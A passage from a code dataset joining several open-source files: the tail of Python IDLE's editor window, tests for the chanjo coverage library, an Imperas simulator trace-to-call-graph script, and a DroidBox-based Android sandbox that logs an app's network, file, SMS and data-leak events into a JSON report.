ncharsdeleted = ncharsdeleted + 1
have = len(chars.expandtabs(tabwidth))
if have <= want or chars[-1] not in " \t":
break
text.undo_block_start()
text.delete("insert-%dc" % ncharsdeleted, "insert")
if have < want:
text.insert("insert", ' ' * (want - have))
text.undo_block_stop()
return "break"
def smart_indent_event(self, event):
# if intraline selection:
# delete it
# elif multiline selection:
# do indent-region
# else:
# indent one level
text = self.text
first, last = self.get_selection_indices()
text.undo_block_start()
try:
if first and last:
if index2line(first) != index2line(last):
return self.indent_region_event(event)
text.delete(first, last)
text.mark_set("insert", first)
prefix = text.get("insert linestart", "insert")
raw, effective = classifyws(prefix, self.tabwidth)
if raw == len(prefix):
# only whitespace to the left
self.reindent_to(effective + self.indentwidth)
else:
# tab to the next 'stop' within or to right of line's text:
if self.usetabs:
pad = '\t'
else:
effective = len(prefix.expandtabs(self.tabwidth))
n = self.indentwidth
pad = ' ' * (n - effective % n)
text.insert("insert", pad)
text.see("insert")
return "break"
finally:
text.undo_block_stop()
def newline_and_indent_event(self, event):
text = self.text
first, last = self.get_selection_indices()
text.undo_block_start()
try:
if first and last:
text.delete(first, last)
text.mark_set("insert", first)
line = text.get("insert linestart", "insert")
i, n = 0, len(line)
while i < n and line[i] in " \t":
i = i+1
if i == n:
# the cursor is in or at leading indentation in a continuation
# line; just inject an empty line at the start
text.insert("insert linestart", '\n')
return "break"
indent = line[:i]
# strip whitespace before insert point unless it's in the prompt
i = 0
last_line_of_prompt = sys.ps1.split('\n')[-1]
while line and line[-1] in " \t" and line != last_line_of_prompt:
line = line[:-1]
i = i+1
if i:
text.delete("insert - %d chars" % i, "insert")
# strip whitespace after insert point
while text.get("insert") in " \t":
text.delete("insert")
# start new line
text.insert("insert", '\n')
# adjust indentation for continuations and block
# open/close first need to find the last stmt
lno = index2line(text.index('insert'))
y = PyParse.Parser(self.indentwidth, self.tabwidth)
if not self.context_use_ps1:
for context in self.num_context_lines:
startat = max(lno - context, 1)
startatindex = repr(startat) + ".0"
rawtext = text.get(startatindex, "insert")
y.set_str(rawtext)
bod = y.find_good_parse_start(
self.context_use_ps1,
self._build_char_in_string_func(startatindex))
if bod is not None or startat == 1:
break
y.set_lo(bod or 0)
else:
r = text.tag_prevrange("console", "insert")
if r:
startatindex = r[1]
else:
startatindex = "1.0"
rawtext = text.get(startatindex, "insert")
y.set_str(rawtext)
y.set_lo(0)
c = y.get_continuation_type()
if c != PyParse.C_NONE:
# The current stmt hasn't ended yet.
if c == PyParse.C_STRING_FIRST_LINE:
# after the first line of a string; do not indent at all
pass
elif c == PyParse.C_STRING_NEXT_LINES:
# inside a string which started before this line;
# just mimic the current indent
text.insert("insert", indent)
elif c == PyParse.C_BRACKET:
# line up with the first (if any) element of the
# last open bracket structure; else indent one
# level beyond the indent of the line with the
# last open bracket
self.reindent_to(y.compute_bracket_indent())
elif c == PyParse.C_BACKSLASH:
# if more than one line in this stmt already, just
# mimic the current indent; else if initial line
# has a start on an assignment stmt, indent to
# beyond leftmost =; else to beyond first chunk of
# non-whitespace on initial line
if y.get_num_lines_in_stmt() > 1:
text.insert("insert", indent)
else:
self.reindent_to(y.compute_backslash_indent())
else:
assert 0, "bogus continuation type %r" % (c,)
return "break"
# This line starts a brand new stmt; indent relative to
# indentation of initial line of closest preceding
# interesting stmt.
indent = y.get_base_indent_string()
text.insert("insert", indent)
if y.is_block_opener():
self.smart_indent_event(event)
elif indent and y.is_block_closer():
self.smart_backspace_event(event)
return "break"
finally:
text.see("insert")
text.undo_block_stop()
# Our editwin provides a is_char_in_string function that works
# with a Tk text index, but PyParse only knows about offsets into
# a string. This builds a function for PyParse that accepts an
# offset.
def _build_char_in_string_func(self, startindex):
def inner(offset, _startindex=startindex,
_icis=self.is_char_in_string):
return _icis(_startindex + "+%dc" % offset)
return inner
def indent_region_event(self, event):
head, tail, chars, lines = self.get_region()
for pos in range(len(lines)):
line = lines[pos]
if line:
raw, effective = classifyws(line, self.tabwidth)
effective = effective + self.indentwidth
lines[pos] = self._make_blanks(effective) + line[raw:]
self.set_region(head, tail, chars, lines)
return "break"
def dedent_region_event(self, event):
head, tail, chars, lines = self.get_region()
for pos in range(len(lines)):
line = lines[pos]
if line:
raw, effective = classifyws(line, self.tabwidth)
effective = max(effective - self.indentwidth, 0)
lines[pos] = self._make_blanks(effective) + line[raw:]
self.set_region(head, tail, chars, lines)
return "break"
def comment_region_event(self, event):
head, tail, chars, lines = self.get_region()
for pos in range(len(lines) - 1):
line = lines[pos]
lines[pos] = '##' + line
self.set_region(head, tail, chars, lines)
def uncomment_region_event(self, event):
head, tail, chars, lines = self.get_region()
for pos in range(len(lines)):
line = lines[pos]
if not line:
continue
if line[:2] == '##':
line = line[2:]
elif line[:1] == '#':
line = line[1:]
lines[pos] = line
self.set_region(head, tail, chars, lines)
def tabify_region_event(self, event):
head, tail, chars, lines = self.get_region()
tabwidth = self._asktabwidth()
if tabwidth is None: return
for pos in range(len(lines)):
line = lines[pos]
if line:
raw, effective = classifyws(line, tabwidth)
ntabs, nspaces = divmod(effective, tabwidth)
lines[pos] = '\t' * ntabs + ' ' * nspaces + line[raw:]
self.set_region(head, tail, chars, lines)
def untabify_region_event(self, event):
head, tail, chars, lines = self.get_region()
tabwidth = self._asktabwidth()
if tabwidth is None: return
for pos in range(len(lines)):
lines[pos] = lines[pos].expandtabs(tabwidth)
self.set_region(head, tail, chars, lines)
def toggle_tabs_event(self, event):
if self.askyesno(
"Toggle tabs",
"Turn tabs " + ("on", "off")[self.usetabs] +
"?\nIndent width " +
("will be", "remains at")[self.usetabs] + " 8." +
"\n Note: a tab is always 8 columns",
parent=self.text):
self.usetabs = not self.usetabs
# Try to prevent inconsistent indentation.
# User must change indent width manually after using tabs.
self.indentwidth = 8
return "break"
# XXX this isn't bound to anything -- see tabwidth comments
## def change_tabwidth_event(self, event):
## new = self._asktabwidth()
## if new != self.tabwidth:
## self.tabwidth = new
## self.set_indentation_params(0, guess=0)
## return "break"
def change_indentwidth_event(self, event):
new = self.askinteger(
"Indent width",
"New indent width (2-16)\n(Always use 8 when using tabs)",
parent=self.text,
initialvalue=self.indentwidth,
minvalue=2,
maxvalue=16)
if new and new != self.indentwidth and not self.usetabs:
self.indentwidth = new
return "break"
def get_region(self):
text = self.text
first, last = self.get_selection_indices()
if first and last:
head = text.index(first + " linestart")
tail = text.index(last + "-1c lineend +1c")
else:
head = text.index("insert linestart")
tail = text.index("insert lineend +1c")
chars = text.get(head, tail)
lines = chars.split("\n")
return head, tail, chars, lines
def set_region(self, head, tail, chars, lines):
text = self.text
newchars = "\n".join(lines)
if newchars == chars:
text.bell()
return
text.tag_remove("sel", "1.0", "end")
text.mark_set("insert", head)
text.undo_block_start()
text.delete(head, tail)
text.insert(head, newchars)
text.undo_block_stop()
text.tag_add("sel", head, "insert")
# Make string that displays as n leading blanks.
def _make_blanks(self, n):
if self.usetabs:
ntabs, nspaces = divmod(n, self.tabwidth)
return '\t' * ntabs + ' ' * nspaces
else:
return ' ' * n
# Delete from beginning of line to insert point, then reinsert
# column logical (meaning use tabs if appropriate) spaces.
def reindent_to(self, column):
text = self.text
text.undo_block_start()
if text.compare("insert linestart", "!=", "insert"):
text.delete("insert linestart", "insert")
if column:
text.insert("insert", self._make_blanks(column))
text.undo_block_stop()
def _asktabwidth(self):
return self.askinteger(
"Tab width",
"Columns per tab? (2-16)",
parent=self.text,
initialvalue=self.indentwidth,
minvalue=2,
maxvalue=16)
# Guess indentwidth from text content.
# Return guessed indentwidth. This should not be believed unless
# it's in a reasonable range (e.g., it will be 0 if no indented
# blocks are found).
def guess_indent(self):
opener, indented = IndentSearcher(self.text, self.tabwidth).run()
if opener and indented:
raw, indentsmall = classifyws(opener, self.tabwidth)
raw, indentlarge = classifyws(indented, self.tabwidth)
else:
indentsmall = indentlarge = 0
return indentlarge - indentsmall
# "line.col" -> line, as an int
def index2line(index):
return int(float(index))
# Look at the leading whitespace in s.
# Return pair (# of leading ws characters,
# effective # of leading blanks after expanding
# tabs to width tabwidth)
def classifyws(s, tabwidth):
raw = effective = 0
for ch in s:
if ch == ' ':
raw = raw + 1
effective = effective + 1
elif ch == '\t':
raw = raw + 1
effective = (effective // tabwidth + 1) * tabwidth
else:
break
return raw, effective
import tokenize
_tokenize = tokenize
del tokenize
class IndentSearcher(object):
# .run() chews over the Text widget, looking for a block opener
# and the stmt following it. Returns a pair,
# (line containing block opener, line containing stmt)
# Either or both may be None.
def __init__(self, text, tabwidth):
self.text = text
self.tabwidth = tabwidth
self.i = self.finished = 0
self.blkopenline = self.indentedline = None
def readline(self):
if self.finished:
return ""
i = self.i = self.i + 1
mark = repr(i) + ".0"
if self.text.compare(mark, ">=", "end"):
return ""
return self.text.get(mark, mark + " lineend+1c")
def tokeneater(self, type, token, start, end, line,
INDENT=_tokenize.INDENT,
NAME=_tokenize.NAME,
OPENERS=('class', 'def', 'for', 'if', 'try', 'while')):
if self.finished:
pass
elif type == NAME and token in OPENERS:
self.blkopenline = line
elif type == INDENT and self.blkopenline:
self.indentedline = line
self.finished = 1
def run(self):
save_tabsize = _tokenize.tabsize
_tokenize.tabsize = self.tabwidth
try:
try:
_tokenize.tokenize(self.readline, self.tokeneater)
except (_tokenize.TokenError, SyntaxError):
# since we cut off the tokenizer early, we can trigger
# spurious errors
pass
finally:
_tokenize.tabsize = save_tabsize
return self.blkopenline, self.indentedline
### end autoindent code ###
def prepstr(s):
# Helper to extract the underscore from a string, e.g.
# prepstr("Co_py") returns (2, "Copy").
i = s.find('_')
if i >= 0:
s = s[:i] + s[i+1:]
return i, s
keynames = {
'bracketleft': '[',
'bracketright': ']',
'slash': '/',
}
def get_accelerator(keydefs, eventname):
keylist = keydefs.get(eventname)
# issue10940: temporary workaround to prevent hang with OS X Cocoa Tk 8.5
# if not keylist:
if (not keylist) or (macosxSupport.runningAsOSXApp() and eventname in {
"<<open-module>>",
"<<goto-line>>",
"<<change-indentwidth>>"}):
return ""
s = keylist[0]
s = re.sub(r"-[a-z]\b", lambda m: m.group().upper(), s)
s = re.sub(r"\b\w+\b", lambda m: keynames.get(m.group(), m.group()), s)
s = re.sub("Key-", "", s)
s = re.sub("Cancel","Ctrl-Break",s) # dscherer@cmu.edu
s = re.sub("Control-", "Ctrl-", s)
s = re.sub("-", "+", s)
s = re.sub("><", " ", s)
s = re.sub("<", "", s)
s = re.sub(">", "", s)
return s
def fixwordbreaks(root):
# Make sure that Tk's double-click and next/previous word
# operations use our definition of a word (i.e. an identifier)
tk = root.tk
tk.call('tcl_wordBreakAfter', 'a b', 0) # make sure word.tcl is loaded
tk.call('set', 'tcl_wordchars', '[a-zA-Z0-9_]')
tk.call('set', 'tcl_nonwordchars', '[^a-zA-Z0-9_]')
def test():
root = Tk()
fixwordbreaks(root)
root.withdraw()
if sys.argv[1:]:
filename = sys.argv[1]
else:
filename = None
edit = EditorWindow(root=root, filename=filename)
edit.set_close_hook(root.quit)
edit.text.bind("<<close-all-windows>>", edit.close_event)
root.mainloop()
root.destroy()
if __name__ == '__main__':
test()
|
ianyh/heroku-buildpack-python-opencv
|
vendor/.heroku/lib/python2.7/idlelib/EditorWindow.py
|
Python
|
mit
| 66,031 | 0.001817 |
"""Test calculate module"""
from chanjo.store.models import Sample
def test_mean(populated_db):
"""Test for calculating mean coverage"""
# GIVEN a database loaded with 2 samples
assert Sample.query.count() == 2
# WHEN calculating mean values across metrics
query = populated_db.mean()
# THEN the results should group over 2 "rows"
results = query.all()
assert len(results) == 2
sample_ids = set(result[0] for result in results)
assert sample_ids == set(['sample', 'sample2']) # sample id
result = results[0]
for metric in filter(None, result[1:]):
assert isinstance(metric, float)
def test_mean_with_samples(populated_db):
"""Test for caluclating mean with samples"""
# GIVEN a database loaded with 2 samples
assert Sample.query.count() == 2
# WHEN calculating mean values across metrics for a particular sample
sample_id = 'sample'
query = populated_db.mean(sample_ids=[sample_id])
# THEN the results should be limited to that sample
results = query.all()
assert len(results) == 1
result = results[0]
assert result[0] == sample_id
def test_gene(populated_db):
"""Test for calculating gene metrics"""
# GIVEN a database populated with a single sample
assert Sample.query.count() == 2
# WHEN calculating average metrics for a gene
gene_id = 28706
query = populated_db.gene_metrics(gene_id)
# THEN the results should add up to a single row
results = query.all()
assert len(results) == 2
result = results[0]
assert result[0] == 'sample'
assert result[-1] == gene_id
def test_sample_coverage(populated_db):
"""Test for OMIM coverage"""
# GIVEN a database populated with two samples
assert Sample.query.count() == 2
sample_ids = ('sample', 'sample2')
gene_ids = (14825, 28706)
# WHEN calculating coverage for sample 'sample' on gene 14825
query = populated_db.sample_coverage(sample_ids=sample_ids, genes=gene_ids)
# THEN query should be a dict with samples as keys, where each sample
# is a dict with keys mean_coverage and mean completeness
assert set(query.keys()) == set(sample_ids)
for _, value in query.items():
assert set(value.keys()) == set(['mean_coverage', 'mean_completeness'])
|
robinandeer/chanjo
|
tests/test_calculate.py
|
Python
|
mit
| 2,295 | 0 |
#!/usr/bin/python
# -*- encoding: utf-8 -*-
#
# Print the sequence of function calls from the Imperas trace file.
#
import sys, string, subprocess, bisect
if len(sys.argv) != 3:
print "Usage: simtrace file.trace vmunix.elf"
sys.exit (1)
# Extract the list of symbols from the binary executable.
nm_command = subprocess.Popen ("nm "+sys.argv[2], shell = True, stdout = subprocess.PIPE)
table = {}
max_addr = 0
for line in nm_command.stdout.readlines():
word = line.split()
addr = int(word[0], 16)
func = word[2]
table[addr] = func
if addr > max_addr:
max_addr = addr
#print "%08x = %s" % (addr, func)
table_keys = sorted(table.keys())
#print table_keys
# Find a name of the function for the given address.
# Return the name and the offset.
def find_function (addr):
if addr <= max_addr:
i = bisect.bisect_right(table_keys, addr)
if i > 0:
last = table_keys[i-1]
return (table[last], addr - last)
return ("", 0)
# Print a function name for the given address.
last_func = ""
def process_instruction(addr, level):
#print "--- process_instruction(%#x)" % addr
global last_func
(func, offset) = find_function (addr)
if func != last_func:
if offset == 0:
print "%08x : %*s%s" % (addr, level*2, "", func)
else:
print "%08x : %*s%s + %u" % (addr, level*2, "", func, offset)
last_func = func
# Check whether the string is a hex number
hex_digits = set(string.hexdigits)
def is_hex(s):
return all(c in hex_digits for c in s)
# Read the trace file.
trace_file = open (sys.argv[1])
pc = 0
op = ""
last_op = ""
level = 0
for line in trace_file.readlines():
word = line.split()
if len(word) > 0 and word[0] == "---":
if pc > max_addr and len(word) == 6 and word[1] == "I/O" and \
word[2] == "Read" and word[5] == "U4STA":
# Skip bootloader timeout
continue
# Print i/o events.
print line.strip()
continue
if len(word) > 1 and word[0] == "Info" and word[1] == "(MIPS32_EXCEPT)":
# Print exceptions.
print "---", string.join(word[3:])
continue
if len(word) < 7:
continue
va = word[2]
pa = word[3]
cca = word[4]
if not (word[1] == ":" and
len(va) == 8 and len(pa) == 8 and
is_hex(va) and is_hex(pa)):
continue
pc = int(va, 16)
# Skip bootloader region.
if pc > max_addr:
continue
if cca != "2:" and cca != "3:":
print "Warning: unexpected CCA value!"
if last_op == "JAL":
level = level + 1
elif last_op == "JR":
level = level - 1
#print pc, ":", string.join(word[6:])
process_instruction(pc, level)
# Keep the history of two last instructions
last_op = op
op = word[6]
if word[6] == "JAL" or word[6] == "JALR":
op = "JAL"
elif (word[6] == "JR" or word[6] == "JR.HB") and word[7] == "$31":
op = "JR"
else:
op = ""
# Print the last executed address.
if pc != 0:
last_func = ""
print "=== Stopped at: ==="
process_instruction(pc, 0)
|
sergev/vak-opensource
|
languages/python/simtrace.py
|
Python
|
apache-2.0
| 3,176 | 0.007557 |
# I have to modify droidbox scripts to let it work with droidbot
# This is a compatible version which generate a report with the same format of original DroidBox
__author__ = 'yuanchun'
################################################################################
# (c) 2011, The Honeynet Project
# Author: Patrik Lantz patrik@pjlantz.com and Laurent Delosieres ldelosieres@hispasec.com
#
# This program is free software you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
################################################################################
"""
Analyze dynamically Android applications
This script allows you to analyze dynamically Android applications.
It installs, runs, and analyzes Android applications.
At the end of each analysis, it outputs the Android application's characteristics in JSON.
Please keep in mind that all data received/sent,
read/written are shown in hexadecimal since the handled data can contain binary data.
"""
import json, time, signal, os, sys
import zipfile
import subprocess
import threading
from threading import Thread
from xml.dom import minidom
from subprocess import call, PIPE, Popen
from utils import AXMLPrinter
import hashlib
tags = {0x1: "TAINT_LOCATION", 0x2: "TAINT_CONTACTS", 0x4: "TAINT_MIC", 0x8: "TAINT_PHONE_NUMBER",
0x10: "TAINT_LOCATION_GPS", 0x20: "TAINT_LOCATION_NET", 0x40: "TAINT_LOCATION_LAST", 0x80: "TAINT_CAMERA",
0x100: "TAINT_ACCELEROMETER", 0x200: "TAINT_SMS", 0x400: "TAINT_IMEI", 0x800: "TAINT_IMSI",
0x1000: "TAINT_ICCID", 0x2000: "TAINT_DEVICE_SN", 0x4000: "TAINT_ACCOUNT", 0x8000: "TAINT_BROWSER",
0x10000: "TAINT_OTHERDB", 0x20000: "TAINT_FILECONTENT", 0x40000: "TAINT_PACKAGE", 0x80000: "TAINT_CALL_LOG",
0x100000: "TAINT_EMAIL", 0x200000: "TAINT_CALENDAR", 0x400000: "TAINT_SETTINGS"}
class LostADBException(Exception):
pass
class DroidBox(object):
def __init__(self, output_dir=None):
self.sendsms = {}
self.phonecalls = {}
self.cryptousage = {}
self.dexclass = {}
self.dataleaks = {}
self.opennet = {}
self.sendnet = {}
self.recvnet = {}
self.closenet = {}
self.fdaccess = {}
self.servicestart = {}
self.accessedfiles = {}
self.enabled = True
self.adb = None
self.application = None
self.apk_name = None
self.apk_hashes = None
self.applicationStarted = 0
self.is_counting_logs = False
self.timer = None
if output_dir:
self.output_dir = output_dir
if not os.path.exists(self.output_dir):
os.mkdir(self.output_dir)
else:
#Posibility that no output-files is generated
self.output_dir = None
def set_apk(self, apk_name):
if not self.enabled:
return
if apk_name is None:
return
# APK existing?
if not os.path.isfile(apk_name):
print("File %s not found" % apk_name)
sys.exit(1)
self.apk_name = os.path.abspath(apk_name)
self.application = Application(apk_name)
ret = self.application.processAPK()
# Error during the APK processing?
if ret == 0:
print("Failed to analyze the APK. Terminate the analysis.")
sys.exit(1)
main_activity = self.application.getMainActivity()
package_name = self.application.getPackage()
self.apk_hashes = self.application.getHashes()
# No Main acitvity found? Return an error
if main_activity == None:
print("No activity to start. Terminate the analysis.")
sys.exit(1)
# No packages identified? Return an error
if package_name == None:
print("No package found. Terminate the analysis.")
sys.exit(1)
# Execute the application
call(["adb", "logcat", "-c"])
ret = call(['monkeyrunner', 'monkeyrunner.py', apk_name,
package_name, main_activity], stderr=None,
cwd=os.path.dirname(os.path.realpath(__file__)))
if (ret == 1):
print("Failed to execute the application.")
sys.exit(1)
print("Starting the activity %s..." % main_activity)
# By default the application has not started
self.applicationStarted = 0
stringApplicationStarted = "Start proc %s" % package_name
# Open the adb logcat
if self.adb is None:
self.adb = Popen(["adb", "logcat", "DroidBox:W", "dalvikvm:W", "ActivityManager:I"], stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
# Wait for the application to start
while 1:
try:
logcatInput = self.adb.stdout.readline()
if not logcatInput:
raise Exception("We have lost the connection with ADB.")
# Application started?
if (stringApplicationStarted in logcatInput):
self.applicationStarted = 1
break
except:
break
if (self.applicationStarted == 0):
print("Analysis has not been done.")
# Kill ADB, otherwise it will never terminate
os.kill(self.adb.pid, signal.SIGTERM)
sys.exit(1)
print("Application started")
def start_unblocked(self, duration=0):
droidbox_thread = threading.Thread(target=self.start_blocked, args=(duration,))
droidbox_thread.start()
def stop(self):
self.enabled = False
if self.timer and self.timer.isAlive():
self.timer.cancel()
if self.adb is not None:
self.adb.terminate()
self.adb = None
def start_blocked(self, duration=0):
if not self.enabled:
return
# curses.setupterm()
# sys.stdout.write(curses.tigetstr("clear"))
sys.stdout.flush()
call(["adb", "wait-for-device"])
call(['adb', 'logcat', '-c'])
print " ____ __ ____"
print "/\ _`\ __ /\ \/\ _`\\"
print "\ \ \/\ \ _ __ ___ /\_\ \_\ \ \ \L\ \ ___ __ _"
print " \ \ \ \ \/\`'__\ __`\/\ \ /'_` \ \ _ <' / __`\/\ \/'\\"
print " \ \ \_\ \ \ \/\ \L\ \ \ \/\ \L\ \ \ \L\ \\ \L\ \/> </"
print " \ \____/\ \_\ \____/\ \_\ \___,_\ \____/ \____//\_/\_\\"
print " \/___/ \/_/\/___/ \/_/\/__,_ /\/___/ \/___/ \//\/_/"
count = CountingThread()
count.start()
timeStamp = time.time()
if duration:
self.timer = threading.Timer(duration, self.stop)
self.timer.start()
if self.adb is None:
self.adb = Popen(["adb", "logcat", "-v", "threadtime", "DroidBox:W", "dalvikvm:W", "ActivityManager:I"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Collect DroidBox logs
self.is_counting_logs = True
self.lastScreenshot = 0
first_log_time = None
from droidbot.state_monitor import StateMonitor
state_monitor = StateMonitor()
state_monitor.start()
while self.enabled:
try:
if self.output_dir and (time.time() - self.lastScreenshot) >=5:
# Take screenshots every 5 seconds.
os.system("adb shell screencap -p | sed 's/\r$//' > %s" % os.path.join(self.output_dir, "screen") \
+ "_$(date +%Y-%m-%d_%H%M%S).png")
self.lastScreenshot = time.time()
logcatInput = self.adb.stdout.readline()
if not logcatInput:
raise LostADBException("We have lost the connection with ADB.")
from droidbot import utils
log_data = utils.parse_log(logcatInput)
if log_data is None or log_data['tag'] != "DroidBox":
continue
log_time = log_data['datetime']
if first_log_time is None:
first_log_time = log_time
log_delta_seconds = (log_time - first_log_time).total_seconds()
log_content = json.loads(decode(log_data['content']))
# DroidBox style report
try:
# dirty workaround: filter out the logs produced by DroidBot
# self.filter_noises(log_content)
# DexClassLoader
if log_content.has_key('DexClassLoader'):
log_content['DexClassLoader']['type'] = 'dexload'
self.dexclass[log_delta_seconds] = log_content['DexClassLoader']
count.increaseCount()
# service started
if log_content.has_key('ServiceStart'):
log_content['ServiceStart']['type'] = 'service'
self.servicestart[log_delta_seconds] = log_content['ServiceStart']
count.increaseCount()
# received data from net
if log_content.has_key('RecvNet'):
host = log_content['RecvNet']['srchost']
port = log_content['RecvNet']['srcport']
self.recvnet[log_delta_seconds] = recvdata = {'type': 'net read', 'host': host,
'port': port,
'data': log_content['RecvNet']['data']}
count.increaseCount()
# fdaccess
if log_content.has_key('FdAccess'):
self.accessedfiles[log_content['FdAccess']['id']] = hexToStr(log_content['FdAccess']['path'])
# file read or write
if log_content.has_key('FileRW'):
log_content['FileRW']['path'] = self.accessedfiles[log_content['FileRW']['id']]
if log_content['FileRW']['operation'] == 'write':
log_content['FileRW']['type'] = 'file write'
else:
log_content['FileRW']['type'] = 'file read'
self.fdaccess[log_delta_seconds] = log_content['FileRW']
count.increaseCount()
# opened network connection log
if log_content.has_key('OpenNet'):
self.opennet[log_delta_seconds] = log_content['OpenNet']
count.increaseCount()
# closed socket
if log_content.has_key('CloseNet'):
self.closenet[log_delta_seconds] = log_content['CloseNet']
count.increaseCount()
# outgoing network activity log
if log_content.has_key('SendNet'):
log_content['SendNet']['type'] = 'net write'
self.sendnet[log_delta_seconds] = log_content['SendNet']
count.increaseCount()
# data leak log
if log_content.has_key('DataLeak'):
my_time = log_delta_seconds
log_content['DataLeak']['type'] = 'leak'
log_content['DataLeak']['tag'] = getTags(int(log_content['DataLeak']['tag'], 16))
self.dataleaks[my_time] = log_content['DataLeak']
count.increaseCount()
if log_content['DataLeak']['sink'] == 'Network':
log_content['DataLeak']['type'] = 'net write'
self.sendnet[my_time] = log_content['DataLeak']
count.increaseCount()
elif log_content['DataLeak']['sink'] == 'File':
log_content['DataLeak']['path'] = self.accessedfiles[log_content['DataLeak']['id']]
if log_content['DataLeak']['operation'] == 'write':
log_content['DataLeak']['type'] = 'file write'
else:
log_content['DataLeak']['type'] = 'file read'
self.fdaccess[my_time] = log_content['DataLeak']
count.increaseCount()
elif log_content['DataLeak']['sink'] == 'SMS':
log_content['DataLeak']['type'] = 'sms'
self.sendsms[my_time] = log_content['DataLeak']
count.increaseCount()
# sent sms log
if log_content.has_key('SendSMS'):
log_content['SendSMS']['type'] = 'sms'
self.sendsms[log_delta_seconds] = log_content['SendSMS']
count.increaseCount()
# phone call log
if log_content.has_key('PhoneCall'):
log_content['PhoneCall']['type'] = 'call'
self.phonecalls[log_delta_seconds] = log_content['PhoneCall']
count.increaseCount()
# crypto api usage log
if log_content.has_key('CryptoUsage'):
log_content['CryptoUsage']['type'] = 'crypto'
self.cryptousage[log_delta_seconds] = log_content['CryptoUsage']
count.increaseCount()
except ValueError:
pass
except KeyboardInterrupt:
break
except LostADBException:
break
except Exception as e:
print(e.message)
continue
self.is_counting_logs = False
count.stopCounting()
count.join()
# Kill ADB, otherwise it will never terminate
self.stop()
self.adb = None
print json.dumps(self.get_output())
if self.output_dir is None:
return
with open(os.path.join(self.output_dir, "analysis.json"),"w") as jsonfile:
jsonfile.write(json.dumps(self.get_output(),sort_keys=True, indent=4))
def get_output(self):
# Done? Store the objects in a dictionary, transform it in a dict object and return it
output = dict()
# Sort the items by their key
output["dexclass"] = self.dexclass
output["servicestart"] = self.servicestart
output["recvnet"] = self.recvnet
output["opennet"] = self.opennet
output["sendnet"] = self.sendnet
output["closenet"] = self.closenet
output["accessedfiles"] = self.accessedfiles
output["dataleaks"] = self.dataleaks
output["fdaccess"] = self.fdaccess
output["sendsms"] = self.sendsms
output["phonecalls"] = self.phonecalls
output["cryptousage"] = self.cryptousage
output["recvsaction"] = self.application.getRecvsaction()
output["enfperm"] = self.application.getEnfperm()
output["hashes"] = self.apk_hashes
output["apkName"] = self.apk_name
return output
def get_counts(self):
output = dict()
# Sort the items by their key
output["dexclass"] = len(self.dexclass)
output["servicestart"] = len(self.servicestart)
output["recvnet"] = len(self.recvnet)
output["opennet"] = len(self.opennet)
output["sendnet"] = len(self.sendnet)
output["closenet"] = len(self.closenet)
output["dataleaks"] = len(self.dataleaks)
output["fdaccess"] = len(self.fdaccess)
output["sendsms"] = len(self.sendsms)
output["phonecalls"] = len(self.phonecalls)
output["cryptousage"] = len(self.cryptousage)
output["sum"] = sum(output.values())
return output
def filter_noises(self, log):
"""
filter use less noises from log
:param log: log of Droidbox in dict format
:return: boolean
"""
if isinstance(log, dict):
# DexClassLoader
if 'DexClassLoader' in log.keys():
if log['DexClassLoader']['path'] in DEXCLASSLOADER_EXCLUDED:
log.pop('DexClassLoader')
# fdaccess
if 'FdAccess' in log.keys():
for excluded_prefix in FDACCESS_EXCLUDED_PREFIX:
if hexToStr(log['FdAccess']['path']).startswith(excluded_prefix):
log.pop('FdAccess')
break
# file read or write
if 'FileRW' in log.keys():
if log['FileRW']['id'] not in self.accessedfiles.keys():
log.pop('FileRW')
return log
DEXCLASSLOADER_EXCLUDED = [
"/system/framework/monkey.jar",
"/system/framework/input.jar",
"/system/framework/am.jar",
]
FDACCESS_EXCLUDED_PREFIX = [
"pipe:",
"socket:",
"/dev/input/event",
]
class CountingThread(Thread):
"""
Used for user interface, showing in progress sign
and number of collected logs from the sandbox system
"""
def __init__(self):
"""
Constructor
"""
Thread.__init__(self)
self.stop = False
self.logs = 0
def stopCounting(self):
"""
Mark to stop this thread
"""
self.stop = True
def increaseCount(self):
self.logs += 1
def run(self):
"""
Update the progress sign and
number of collected logs
"""
signs = ['|', '/', '-', '\\']
counter = 0
while 1:
sign = signs[counter % len(signs)]
sys.stdout.write(" \033[132m[%s] Collected %s sandbox logs\033[1m (Ctrl-C to view logs)\r" % (
sign, str(self.logs)))
sys.stdout.flush()
time.sleep(0.5)
counter = counter + 1
if self.stop:
sys.stdout.write(
" \033[132m[%s] Collected %s sandbox logs\033[1m%s\r" % ('*', str(self.logs), ' ' * 25))
sys.stdout.flush()
break
class Application:
"""
Used for extracting information of an Android APK
"""
def __init__(self, filename):
self.filename = filename
self.packageNames = []
self.enfperm = []
self.permissions = []
self.recvs = []
self.activities = {}
self.recvsaction = {}
self.mainActivity = None
def processAPK(self):
xml = {}
error = True
try:
zip = zipfile.ZipFile(self.filename)
for i in zip.namelist():
if i == "AndroidManifest.xml":
try:
xml[i] = minidom.parseString(zip.read(i))
except:
xml[i] = minidom.parseString(AXMLPrinter(zip.read(i)).getBuff())
for item in xml[i].getElementsByTagName('manifest'):
self.packageNames.append(str(item.getAttribute("package")))
for item in xml[i].getElementsByTagName('permission'):
self.enfperm.append(str(item.getAttribute("android:name")))
for item in xml[i].getElementsByTagName('uses-permission'):
self.permissions.append(str(item.getAttribute("android:name")))
for item in xml[i].getElementsByTagName('receiver'):
self.recvs.append(str(item.getAttribute("android:name")))
for child in item.getElementsByTagName('action'):
self.recvsaction[str(item.getAttribute("android:name"))] = (
str(child.getAttribute("android:name")))
for item in xml[i].getElementsByTagName('activity'):
activity = str(item.getAttribute("android:name"))
self.activities[activity] = {}
self.activities[activity]["actions"] = list()
for child in item.getElementsByTagName('action'):
self.activities[activity]["actions"].append(str(child.getAttribute("android:name")))
for activity in self.activities:
for action in self.activities[activity]["actions"]:
if action == 'android.intent.action.MAIN':
self.mainActivity = activity
error = False
break
if (error == False):
return 1
else:
return 0
except:
return 0
def getEnfperm(self):
return self.enfperm
def getRecvsaction(self):
return self.recvsaction
def getMainActivity(self):
return self.mainActivity
def getActivities(self):
return self.activities
def getPermissions(self):
return self.permissions
def getRecvActions(self):
return self.recvsaction
def getPackage(self):
# One application has only one package name
